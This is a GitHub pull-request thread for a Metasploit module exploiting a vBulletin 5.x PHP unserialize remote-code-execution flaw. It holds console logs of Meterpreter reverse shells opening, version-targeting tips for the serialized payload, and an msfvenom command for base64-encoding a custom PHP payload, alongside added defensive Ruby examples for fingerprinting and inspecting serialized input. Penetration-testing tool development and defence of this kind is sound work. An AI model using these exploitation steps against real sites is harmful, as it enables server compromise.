
Implement a module for the recent vBulletin RCE #6196

Merged 6 commits into rapid7:master on Nov 12, 2015

jvoisin (Contributor) commented Nov 6, 2015

This module implements the recent unserialize-powered RCE against vBulletin 5.1.X

Steps to reproduce:

  1. Install vBulletin 5.1.X (it's not free software; you have to buy it)
  2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```

Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Steps to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
nixawk (Contributor) commented Nov 6, 2015

Please add a TARGETURI option here, and let's set the vBulletin URL.

madmike33 commented Nov 6, 2015

@jvoisin when running it I am getting

```
[*] Started reverse handler on (my:ip) 4444
[*] Exploit completed, but no session was created.
```

jvoisin (Contributor, Author) commented Nov 6, 2015

Super sorry, I had an encoder enabled!
I added double quotes as a badchar; it should work now.

```
end

def check
res = send_request_cgi({ 'uri' => '/' })
```

wchen-r7 (Contributor) commented on the diff, Nov 6, 2015

You should probably make use of the URI from TARGETURI like you did in def exploit.


```
def check
res = send_request_cgi({ 'uri' => '/' })
if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright © 2015 vBulletin Solutions, Inc./)
```

wchen-r7 (Contributor) commented on the diff, Nov 6, 2015

Remember to escape the dots :-)

Or if you want, you can do: res.body.include?(), which doesn't use a regex.
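The two review comments above concern the module's check method: build the request path from TARGETURI instead of hard-coding '/', and escape the dots in the version regex (or compare with include?, which needs no escaping). The following is an added example, not code from the PR or from metasploit-framework, that shows the difference on constructed sample response bodies: an unescaped /Version 5.1./ accepts a look-alike string, the escaped form does not. check_path is a hypothetical stand-in for joining TARGETURI with a sub-path, and the sample bodies are made up.

```ruby
# Added example (not the PR's module code): vBulletin version fingerprint
# written the way the review asks, plus a small path helper.

# Escaped dots, and the minor number captured so one check covers both
# branches the thread mentions (5.0.x and 5.1.x).
VERSION_RE = /Version 5\.([01])\.\d+/

# The copyright line the original check looked for, compared with include?
# (no regex, nothing to escape).
COPYRIGHT_LINE = 'Copyright © 2015 vBulletin Solutions, Inc.'

# Returns "5.0.x", "5.1.x", or nil when the body is not a recognised vBulletin page.
def vbulletin_branch(body)
  return nil unless body && body.include?(COPYRIGHT_LINE)
  m = VERSION_RE.match(body)
  m && "5.#{m[1]}.x"
end

# Hypothetical stand-in for building the check URI from TARGETURI: one leading
# slash, doubled slashes collapsed, so 'forum' and '/forum/' both give '/forum/'.
def check_path(target_uri, sub = '/')
  ('/' + target_uri.to_s + '/' + sub.to_s).gsub(%r{/+}, '/')
end

# Constructed sample bodies (not captured from a real server).
SAMPLE_51 = '<html><footer>Version 5.1.7 Copyright © 2015 vBulletin Solutions, Inc.</footer></html>'
SAMPLE_50 = '<footer>Version 5.0.5 Copyright © 2015 vBulletin Solutions, Inc.</footer>'
# "5x1y" is what an unescaped /Version 5.1./ would still accept.
SAMPLE_LOOKALIKE = 'Version 5x1y Copyright © 2015 vBulletin Solutions, Inc.'

def run_samples
  {
    '5.1' => vbulletin_branch(SAMPLE_51),
    '5.0' => vbulletin_branch(SAMPLE_50),
    'lookalike' => vbulletin_branch(SAMPLE_LOOKALIKE),
    # the regex exactly as it appeared in the diff under review
    'unescaped' => (SAMPLE_LOOKALIKE =~ /Version 5.1./)
  }
end

puts run_samples.inspect if __FILE__ == $PROGRAM_NAME
```

The 'unescaped' entry returns a match offset (0) on the look-alike body while vbulletin_branch returns nil for it, which is the whole point of the reviewer's remark.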

wchen-r7 (Contributor) commented Nov 6, 2015

👍

madmike33 commented Nov 6, 2015

GREAT JOB MATES !!! :)

wchen-r7 self-assigned this Nov 6, 2015

madmike33 commented Nov 6, 2015

However, when trying to implement a custom payload I get this:

```
Exploit failed: No encoders encoded the buffer successfully.
```

jvoisin (Contributor, Author) commented Nov 6, 2015

Shall I enforce the use of the php/base64 encoder then?

madmike33 commented Nov 6, 2015

Yes, I think you should; the payload needs to be encoded :) (in most cases the custom payloads are in PHP)

jvoisin (Contributor, Author) commented Nov 6, 2015

Specifying the badchars isn't enough?

madmike33 commented Nov 6, 2015

Depends, but let's say if your aim is to upload the PHP payload, I think it isn't enough 👍 because you might never know what payload is going to be used. But please do add it; I would like to test it.

madmike33 commented Nov 6, 2015

Or maybe the best option is to make it upload a PHP reverse shell; in this case you need base64, but at least it will save lots of time.

wchen-r7 (Contributor) commented Nov 6, 2015

@madmantm For the encoder failure you hit, were you doing this: set payload generic/custom? If yes, by default the payload ARCH and PLATFORM are empty.... and if I remember correctly, the encoder is determined by these two from the payload (not the exploit). So you need to set them as well. Please give that a try.

Hood3dRob1n commented Nov 7, 2015

If you change vB_Database_MySQLi to vB_Database and adjust the string length from 18 to 11 in the serialized string, it also works against 5.0.0 - 5.0.5 as well ;)

nixawk (Contributor) commented Nov 7, 2015

@jvoisin Cool! It exploits Windows 7 Home Premium Edition + vBulletin 5.1.7 successfully. vBulletin 5.1.2 is one of the targets.

```
msf exploit(vbulletin_unserialize) > check 
[*] 192.168.1.101:80 - Cannot reliably check exploitability.
msf exploit(vbulletin_unserialize) > run 

[*] Started reverse handler on 192.168.1.108:4444 
[*] Sending stage (33068 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.101:1037) at 2015-11-07 02:57:33 +0000

meterpreter > sysinfo 
Computer    : SECLAB
OS          : Windows NT SECLAB 6.1 build 7601 (Windows 7 Home Premium Edition Service Pack 1) i586
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.101 - Meterpreter session 1 closed.  Reason: User exit
```

@Hood3dRob1n

  • vB_Database is only valid for vBulletin 5.0.X,
  • vB_Database_MySQLi can exploit vBulletin 5.1.x.

Is there a way to exploit both 5.0.x and 5.1.x?
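The two comments above turn on a detail of PHP's serialize() format: an object is written as O:<length>:"<class name>":<property count>:{...}, so swapping vB_Database_MySQLi (18 bytes) for vB_Database (11 bytes) also means changing the length prefix, and a prefix that does not match the name is simply malformed data. The following is an added example, not code from the PR, from vBulletin or from metasploit-framework, written from the defender's side: a small parser for that format that validates every length prefix and returns the class names of the objects the blob would instantiate, so data bound for unserialize() can be checked against an allow-list and logged or rejected beforehand. It covers the N, b, i, d, s, a and O types only (no references or custom-serialized C: objects), and the sample strings are constructed.

```ruby
# Added example (not the PR's code): minimal parser for PHP's serialize()
# format that checks length prefixes and collects object class names, for
# inspecting input before it ever reaches unserialize().
class PhpUnserializeInspector
  class FormatError < StandardError; end

  attr_reader :classes, :pos

  # Length prefixes count bytes, so work on a binary copy of the input.
  def initialize(data)
    @s = data.b
    @pos = 0
    @classes = []
  end

  # Parse one complete serialized value; return the object class names found, in order.
  def self.object_classes(data)
    parser = new(data)
    parser.parse_value
    raise FormatError, "trailing data at byte #{parser.pos}" unless parser.pos == parser.size
    parser.classes.map { |c| c.force_encoding(Encoding::UTF_8) }
  end

  def size
    @s.bytesize
  end

  def parse_value
    type = take(1)
    case type
    when 'N' then expect(';'); nil                      # N;
    when 'b' then expect(':'); read_until(';') == '1'   # b:1;
    when 'i' then expect(':'); read_until(';').to_i     # i:42;
    when 'd' then expect(':'); read_until(';').to_f     # d:1.5;
    when 's' then read_string                            # s:5:"hello";
    when 'a'                                             # a:<count>:{key value ...}
      expect(':')
      count = read_until(':').to_i
      expect('{')
      arr = {}
      count.times { k = parse_value; arr[k] = parse_value }
      expect('}')
      arr
    when 'O'                                             # O:<len>:"<class>":<count>:{key value ...}
      expect(':')
      name = read_quoted(read_until(':').to_i)
      expect(':')
      count = read_until(':').to_i
      expect('{')
      @classes << name
      props = {}
      count.times { k = parse_value; props[k] = parse_value }
      expect('}')
      { class: name, props: props }
    else
      raise FormatError, "unsupported type #{type.inspect} at byte #{@pos - 1}"
    end
  end

  private

  def read_string
    expect(':')
    str = read_quoted(read_until(':').to_i)
    expect(';')
    str
  end

  # Exactly len bytes between double quotes. A wrong prefix (18 for an 11-byte
  # class name, or vice versa) lands on the wrong byte and fails here.
  def read_quoted(len)
    expect('"')
    str = take(len)
    expect('"')
    str
  end

  def take(n)
    chunk = @s[@pos, n]
    raise FormatError, "truncated at byte #{@pos}" if chunk.nil? || chunk.bytesize < n
    @pos += n
    chunk
  end

  def expect(ch)
    got = take(1)
    raise FormatError, "expected #{ch.inspect} at byte #{@pos - 1}, got #{got.inspect}" unless got == ch
  end

  def read_until(ch)
    stop = @s.index(ch, @pos)
    raise FormatError, "missing #{ch.inspect} after byte #{@pos}" unless stop
    value = @s[@pos...stop]
    @pos = stop + 1
    value
  end
end

# Defensive check: object classes present in the input that the application
# never expects to receive (the vB_Database names from the thread, for instance).
def unexpected_classes(data, allowed)
  PhpUnserializeInspector.object_classes(data) - allowed
end

# Constructed sample inputs (not captured traffic).
SAMPLE_OK  = 'a:2:{i:0;s:5:"hello";i:1;O:11:"vB_Database":1:{s:3:"foo";N;}}'
SAMPLE_BAD = 'O:18:"vB_Database":0:{}' # prefix says 18 bytes, the name has 11
```

Wiring this in front of an unserialize() call (or over request logs) turns the class-name/length pair the thread is discussing into something a defender can reject or alert on: unexpected_classes(SAMPLE_OK, ['stdClass']) reports vB_Database, and SAMPLE_BAD raises FormatError before any class name is even returned.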

madmike33 commented Nov 7, 2015

Good point @Hood3dRob1n

madmike33 commented Nov 7, 2015

But I think the module needs to be modified so it uploads a payload directly. I mean, I have tested it on localhost and it works great, but I hosted it on one of my offshore servers and it shows nothing; all I get is this:

```
[*] Started reverse handler on 192.168.1.108:4444
```

madmike33 commented Nov 7, 2015

@wchen-r7 I think you meant me? Well, I tried; for some reason nothing changed, same... Any other suggestions?

wchen-r7 (Contributor) commented Nov 7, 2015

@madmike33 Yeah sorry, I meant you.

I looked into the problem a little bit deeper. It turns out the exploit isn't at fault for the user being unable to use a custom payload; in fact it's actually payloads/single/generic/custom.rb always forcing the 'none' encoder. Basically this means this is a wide-spread issue in Metasploit Framework. When you use the generic/custom payload, encoding is just not supported regardless of what exploit you're using.

This is the bug:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/generic/custom.rb#L57

Basically, that loop means "I only accept the generic/none encoder".

The good news is.......... I don't think this issue should be a blocker for this exploit. But we definitely need to file it.

wchen-r7 (Contributor) commented Nov 7, 2015

@madmike33 Also, I think the workaround for you is:

  1. Save your custom PHP payload as a file (let's call it "/tmp/test.php" here)
  2. Use msfvenom to encode it manually: cat /tmp/test.php | ./msfvenom -e php/base64 --arch=php --platform=php -o /tmp/encoded_php_payload.php
  3. Load the exploit
  4. set payload generic/custom
  5. set PAYLOADFILE /tmp/encoded_php_payload.php
  6. Configure the rest of the mandatory database options
  7. run. The exploit should fire without the encoding problem.

madmike33 commented Nov 7, 2015

@wchen-r7 Well, I didn't know this was a bug until recently, because honestly I have been using custom payloads on all the msf modules; I just had problems with some of them, but not all in general. However, I will try what you suggested and provide feedback. However, what do you think is the reason for my other issue? When I run the module against some remote website I have made for testing, all I get is

```
[*] Started reverse handler on 192.168.1.108:4444
```

And that's it: no shell, nothing. I didn't have time to wireshark it, but... I don't think it's a problem on my side.

jvoisin (Contributor, Author) commented Nov 7, 2015

The exploit now supports 5.0.x and 5.1.x
Thank you for the feedback/idea Hood3dRob1n :)

The module now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X

madmike33 commented Nov 7, 2015

@jvoisin any idea about my issue :/

jvoisin (Contributor, Author) commented Nov 7, 2015

@wchen-r7 already explained the issue, and even gave you a workaround.

wchen-r7 (Contributor) commented Nov 7, 2015

@madmike33 You were testing against a remote website? Do you legally own the server and remote network? It looks like you are listening on 192.168.1.08, which means you are also telling the reverse shell to connect to 192.168.1.108. Unless you're both sitting on the same internal network, that network/config setup won't work.

This would be difficult for me to help you any further, because I'm not able to verify the legitimacy of your pentest (no offense). Sorry.

madmike33 commented Nov 7, 2015

Sure man, I do own this server, and I have run a vBulletin installation just to test this module; however, I do understand. Don't worry, I will figure it out myself :)

madmike33 commented Nov 9, 2015

Thank you @wchen-r7, problem solved after I did what you said :) and thank you @jvoisin for the module!!!

wchen-r7 (Contributor) commented Nov 9, 2015

👍

I will try to land the module as soon as possible.

wchen-r7 (Contributor) commented Nov 10, 2015

Does anybody have a vBulletin 5.0.0 beta 13? This is what I have.... and the exploit doesn't work against it.

madmike33 commented Nov 11, 2015

Yes, for me 5.0.0 beta 13 also doesn't work.

wchen-r7 (Contributor) commented Nov 11, 2015

@jvoisin Could you please send me a pcap of the exploit successfully getting a shell? Please send to wei_chen[at]rapid7.com. Thanks!

jvoisin (Contributor, Author) commented Nov 12, 2015

@wchen-r7 done.
Please squash my commit before merging it :)

wchen-r7 (Contributor) commented Nov 12, 2015

Got the pcap, thank you!

wchen-r7 merged commit e2678af into rapid7:master Nov 12, 2015

1 check passed: continuous-integration/travis-ci/pr (The Travis CI build passed)

wchen-r7 added a commit that referenced this pull request Nov 12, 2015

wchen-r7 (Contributor) commented Nov 12, 2015

Merged. Thanks everyone for testing!

BTW, since @all3g says it works on Windows too (and it looks like it does), I moved the module to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vbulletin_unserialize.rb.
